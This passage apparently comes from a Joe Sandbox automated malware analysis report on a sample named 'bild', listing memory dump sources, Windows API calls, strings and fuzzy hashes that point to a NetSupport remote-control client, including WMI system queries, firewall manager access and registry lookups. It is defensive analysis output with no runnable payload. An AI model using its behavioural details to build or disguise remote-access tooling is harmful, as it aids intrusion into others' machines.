                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad$CreateEventException@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                  • String ID: Advapi32.dll$Wtsapi32.dll
                                                                                  • API String ID: 2851125068-2390547818
                                                                                  • Opcode ID: aaba10e307cec69a1f7ff7a57bac704082b679f648b946fc7c8140d35e3eefa9
                                                                                  • Instruction ID: 20da51148d2406ef940ba90f631bbe284ff6dbb95dc7cb8c25b5cdc78ae8e1aa
                                                                                  • Opcode Fuzzy Hash: aaba10e307cec69a1f7ff7a57bac704082b679f648b946fc7c8140d35e3eefa9
                                                                                  • Instruction Fuzzy Hash: 2A4115B4D09B449FC761CF6A8940BDAFBE8EFA9604F00490EE5AE93210D7797500CF56
                                                                                  APIs
                                                                                  • WaitForSingleObject.KERNEL32(0000030C,000000FF), ref: 1101733C
                                                                                  • CoInitialize.OLE32(00000000), ref: 11017345
                                                                                  • _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101736C
                                                                                  • CoUninitialize.COMBASE ref: 110173D0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                  • String ID: PCSystemTypeEx$Win32_ComputerSystem
                                                                                  • API String ID: 2407233060-578995875
                                                                                  • Opcode ID: 3ab08bcf13d713d750a6400e0dd08c6ca0ab4b874316cbd8a5b8b2923fc85cec
                                                                                  • Instruction ID: df925c951649f52390f194a40c23bf9fa59b5f59fb7a44760539d7ccd5920114
                                                                                  • Opcode Fuzzy Hash: 3ab08bcf13d713d750a6400e0dd08c6ca0ab4b874316cbd8a5b8b2923fc85cec
                                                                                  • Instruction Fuzzy Hash: 7F2137B5E041259BDB11DFA0CC46BBAB6E8AF40308F0040B9EC69DB184FA79E940D7A1
                                                                                  APIs
                                                                                  • WaitForSingleObject.KERNEL32(0000030C,000000FF), ref: 11017252
                                                                                  • CoInitialize.OLE32(00000000), ref: 1101725B
                                                                                  • _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017282
                                                                                  • CoUninitialize.COMBASE ref: 110172E0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                  • String ID: ChassisTypes$Win32_SystemEnclosure
                                                                                  • API String ID: 2407233060-2037925671
                                                                                  • Opcode ID: 03f14ebb68a291b498bc3e28f26753d57b14005c3c93e514e963537cc8d20d91
                                                                                  • Instruction ID: c2f3c346b695d23426c96ecc328f7bdb1aeadc280033f44fb53199f8ba8604cb
                                                                                  • Opcode Fuzzy Hash: 03f14ebb68a291b498bc3e28f26753d57b14005c3c93e514e963537cc8d20d91
                                                                                  • Instruction Fuzzy Hash: 19210575E016299BD712DFE0CC45BEEB7E89F80718F0001A8FC29DB184EA7AE945C761
                                                                                  APIs
                                                                                  Strings
                                                                                  • DoICFConfig() OK, xrefs: 11138786
                                                                                  • DesktopTimerProc - Further ICF config checking will not be performed, xrefs: 1113879C
                                                                                  • Client, xrefs: 11138705
                                                                                  • AutoICFConfig, xrefs: 11138700
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CountTick
                                                                                  • String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK
                                                                                  • API String ID: 536389180-1512301160
                                                                                  • Opcode ID: a952649d10152439879ed58b5e1132f0d59133535c4a4a3642475d19345c2f1e
                                                                                  • Instruction ID: a0019f70d98f4d819e239f855ef0bc8db2e19db1671bc02c3e0d3b7677daedde
                                                                                  • Opcode Fuzzy Hash: a952649d10152439879ed58b5e1132f0d59133535c4a4a3642475d19345c2f1e
                                                                                  • Instruction Fuzzy Hash: E4210578A247AB4AFB039B759ED4755FB83578073EF450278DE10862CCDB74A458CB42
                                                                                  APIs
                                                                                  • CoInitialize.OLE32(00000000), ref: 11096984
                                                                                  • CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,1113769B), ref: 1109699E
                                                                                  • CoCreateInstance.OLE32(?,00000000,00000001,111C08AC,?,?,?,?,?,?,?,1113769B), ref: 110969BB
                                                                                  • CoUninitialize.OLE32(?,?,?,?,?,?,1113769B), ref: 110969D9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateFromInitializeInstanceProgUninitialize
                                                                                  • String ID: HNetCfg.FwMgr$ICF Present:
                                                                                  • API String ID: 3222248624-258972079
                                                                                  • Opcode ID: f34227f50c1ea86a65abb9f5b461b7bcbc9d9ad9ed009c44ac4fae2586091261
                                                                                  • Instruction ID: ffe5b7852bae71a5603cb4f529131e3535c43cf5cc9a129c5e7f13935f1cb029
                                                                                  • Opcode Fuzzy Hash: f34227f50c1ea86a65abb9f5b461b7bcbc9d9ad9ed009c44ac4fae2586091261
                                                                                  • Instruction Fuzzy Hash: 9C11AC74E0012DABC700EAE5DC95AEFBB68AF45709F100029F50AEB144EA21EA40C7E2
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11025D16
                                                                                  • K32GetProcessImageFileNameA.KERNEL32(?,?,?,1110720F,00000000,00000000,?,11106527,00000000,?,00000104), ref: 11025D32
                                                                                  • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11025D46
                                                                                  • SetLastError.KERNEL32(00000078,1110720F,00000000,00000000,?,11106527,00000000,?,00000104), ref: 11025D69
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressProc$ErrorFileImageLastNameProcess
                                                                                  • String ID: GetModuleFileNameExA$GetProcessImageFileNameA
                                                                                  • API String ID: 4186647306-532032230
                                                                                  • Opcode ID: fbb342385a7ca70d12a15f9985bda82124cf97ba9cccb812bf362dda13377f65
                                                                                  • Instruction ID: 74662284ed99b9a54ad109221a671fe8fcdc3fa540ca7c31caa090441a4958f5
                                                                                  • Opcode Fuzzy Hash: fbb342385a7ca70d12a15f9985bda82124cf97ba9cccb812bf362dda13377f65
                                                                                  • Instruction Fuzzy Hash: 98016D72601718ABE330DEA5EC48F87B7E8EB88765F10052AF95697200D631E8018BA4
                                                                                  APIs
                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EDC3F0,00000000,?,11110245,1110FDE0,00000001,00000000), ref: 1110F2C7
                                                                                  • CreateThread.KERNEL32(00000000,11110245,00000001,00000000,00000000,0000000C), ref: 1110F2EA
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F317
                                                                                  • CloseHandle.KERNEL32(?,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F321
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                  • String ID: ..\ctl32\Refcount.cpp$hThread
                                                                                  • API String ID: 3360349984-1136101629
                                                                                  • Opcode ID: c9018d34e74e4049c7ebca087304ef1218ab8024f9415a3366a00b8023e95b9a
                                                                                  • Instruction ID: 7cf91fcea6c2a3c5c2684f5d08a561b662f4dc7f01f0c277a0d6c7245401f800
                                                                                  • Opcode Fuzzy Hash: c9018d34e74e4049c7ebca087304ef1218ab8024f9415a3366a00b8023e95b9a
                                                                                  • Instruction Fuzzy Hash: E7015E7A7443166FE3209EA9CC86F57FBA8DB44764F104128FA25962C4DA60F805CB64
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: wsprintf
                                                                                  • String ID: %s%s%s.bin$878411$_HF$_HW$_SW
                                                                                  • API String ID: 2111968516-3519358435
                                                                                  • Opcode ID: b97882e65002706a22fb778f12bbc90950e65c749b3e8462a2311051e46cf205
                                                                                  • Instruction ID: 34a826dfca0d5743c415d593f242b0f3cefc790b54bbadf5113738552eb06063
                                                                                  • Opcode Fuzzy Hash: b97882e65002706a22fb778f12bbc90950e65c749b3e8462a2311051e46cf205
                                                                                  • Instruction Fuzzy Hash: 93E092A1D1870C6FF70085589C15F9EFAE87B4978EFC48051BEEDA7292E935D60082D6
                                                                                  APIs
                                                                                  • GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 11102B03
                                                                                  • GetStockObject.GDI32(00000004), ref: 11102B5B
                                                                                  • RegisterClassA.USER32(?), ref: 11102B6F
                                                                                  • CreateWindowExA.USER32(00000000,NSMDesktopWnd,?,00000000,00000000,00000000,00000000,00000000,00130000,00000000,11000000,00000000), ref: 11102BAC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AtomClassCreateGlobalObjectRegisterStockWindow
                                                                                  • String ID: NSMDesktopWnd
                                                                                  • API String ID: 2669163067-206650970
                                                                                  • Opcode ID: e27069a72c11c1f4eb1c56e7938a9b61728f0754eae0ec1cd31abd721b9bda48
                                                                                  • Instruction ID: 4c07b853b75387a4d851a66abc04609236edd6d81c14be1d28904dd9f6a0e6ac
                                                                                  • Opcode Fuzzy Hash: e27069a72c11c1f4eb1c56e7938a9b61728f0754eae0ec1cd31abd721b9bda48
                                                                                  • Instruction Fuzzy Hash: C231F4B0D15619AFDB44CFA9D980A9EFBF4FB08314F50962EE46AE3640E7346900CF94
                                                                                  APIs
                                                                                  • KillTimer.USER32(00000000,00000000,TermUI...), ref: 1113CC9A
                                                                                  • KillTimer.USER32(00000000,00007F79,TermUI...), ref: 1113CCB3
                                                                                  • FreeLibrary.KERNEL32(76A50000,?,TermUI...), ref: 1113CD2B
                                                                                  • FreeLibrary.KERNEL32(00000000,?,TermUI...), ref: 1113CD43
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeKillLibraryTimer
                                                                                  • String ID: TermUI
                                                                                  • API String ID: 2006562601-4085834059
                                                                                  • Opcode ID: 0b8b98d89ae2f905afc74c8ae1c01cea1ae783866c2b84ef9f483cfa62b8061f
                                                                                  • Instruction ID: 1c615ec055e307fcecd6c2f5a0081f3099d40e524c959ad3afbad8c7da76a6da
                                                                                  • Opcode Fuzzy Hash: 0b8b98d89ae2f905afc74c8ae1c01cea1ae783866c2b84ef9f483cfa62b8061f
                                                                                  • Instruction Fuzzy Hash: 813182B46121329FE605DF9ACDE496EFB6ABBC4B1C750402BF4689720CE770A845CF91
                                                                                  APIs
                                                                                  • RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 111453A0
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 11145404
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseOpen
                                                                                  • String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
                                                                                  • API String ID: 47109696-3245241687
                                                                                  • Opcode ID: 2e1f21c9ebfd0fdc4230699bf98ebb40bf83fdb687853d653e48f9fb82f12d2f
                                                                                  • Instruction ID: 3a61aca8bf2f26e8be4db12f87e0943ca7983303b4b50086f785ef97d0623835
                                                                                  • Opcode Fuzzy Hash: 2e1f21c9ebfd0fdc4230699bf98ebb40bf83fdb687853d653e48f9fb82f12d2f
                                                                                  • Instruction Fuzzy Hash: 56218875E0422A9BE760DB64CD80B9EF7B8EB44708F1042AAD85DF7540E771AD458BB0
                                                                                  APIs
                                                                                    • Part of subcall function 11111430: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111145A
                                                                                    • Part of subcall function 11111430: __wsplitpath.LIBCMT ref: 11111475
                                                                                    • Part of subcall function 11111430: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111114A9
                                                                                  • GetComputerNameA.KERNEL32(?,?), ref: 11111578
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
